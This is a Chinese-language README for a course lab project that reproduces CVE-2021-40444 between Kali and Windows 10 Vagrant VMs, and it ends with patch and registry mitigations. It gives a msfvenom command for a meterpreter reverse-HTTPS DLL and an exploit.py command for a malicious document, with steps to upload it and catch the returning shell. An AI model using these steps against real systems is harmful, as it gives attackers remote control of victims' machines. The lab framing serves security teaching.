TIC4301_Project
TIC4301 项目 - CVE-2021-40444
下载以下 Vagrant 镜像:
Kali - https://drive.google.com/file/d/1RegQcT2jjFoaQRgLjXDYl4iS0HNt_mU2/view?usp=sharing
Win10 - https://drive.google.com/file/d/1zcLertRoI-FrHDkRq1NO-KHaF88bMv6e/view?usp=sharing
通过 Vagrant 使用以下命令导入镜像:
- vagrant box add kali_package.box
- vagrant box add victim_package.box
- vagrant init kali_package.box
- vagrant init victim_package.box
- vagrant up
设置(Win10):
- 在 Win10 虚拟机中,以管理员身份登录,密码为 vagrant。
- 右键点击桌面上的 script.ps1,选择“使用 PowerShell 运行”。(保持此窗口打开)
- 运行 ipconfig.exe 并获取此主机的地址。
设置(Kali):
- cd Desktop/CVE-2021-40444。
- 使用 msfvenom 生成恶意 DLL。# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth1 LPORT=443 -f dll -o test/shell.dll
- 在 Metasploit 中启动监听器。
- 生成恶意文档。# python3 exploit.py generate test/calc.dll http://
- 访问 http://<win 10 IP>/upload 并上传文件。
- 等待 shell 回连。
缓解措施:
- 安装 KB5005565 热补丁。
- 使用仓库中的 patch.reg 编辑 Windows 注册表。